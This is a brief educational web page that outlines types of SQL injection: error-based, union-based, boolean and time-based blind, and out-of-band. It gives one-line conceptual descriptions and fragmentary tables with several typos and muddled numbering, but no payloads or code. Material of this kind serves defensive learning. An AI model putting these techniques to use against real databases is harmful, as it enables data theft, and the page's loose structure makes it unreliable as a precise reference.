Discover the various Types of SQLi (SQLi) attacks, such as Classic SQLi, Blind SQLi, and Out-of-Band SQLi.
Understand how each type targets web applications, the risks involved, and best practices to secure your database from these common vulnerabilities.
Types of SQLi:
1: SQLi:1: In-band SQLi 2: Inferential SQLi
- Error-based SQLi
- Union-based SQLi
1: Error-based SQLi:
1: Relies on error messages.
2: Thrown by the database server.
3: To obtain information.
4: About the structure of the database.
2: Union-based SQLi:
1: Leverages the UNION SQL operator.
2: To combine the results of two/more SELECT statements.
3: Which is returned as part of the HTTP response.
3: Inferential SQLi:
1: Also known as Blink SQLi.
2: Takes more time to take.
3: Boolean-based Blind SQLi.
4: Time-based Blind SQLi.
4: Boolean-based Blind SQLi:
1: Relies on sending an SQL query to the database.
2: Which forces the application to return a different result?
3: Depends on query types (True or False).
5: Time-based Blind SQLi:
1: Forces the database to wait for a specified time.
2: Response time will indicate the result of TRUE? FALASE query.
3: This attack is typically slow.
4: Since enumeration is done character by character.
| In-Band | Inferential |
| Out-of-Band |
In-Band SQLi
Results in the Application’s response
| Error-Based: Inject SQL statement to produce Error. |
| Union-Based: Inject SQL statement to produce |
| Multiple results |
Blind Based SQLi or Inferential SQLi
| Boolean-based Blind: Conditions |
| Time-based Blind: Response time |
Out-of-Band SQLi
| Export results | External system |
| Mail Address | File |
| Remote Server |
For more information, visit SQL Injection
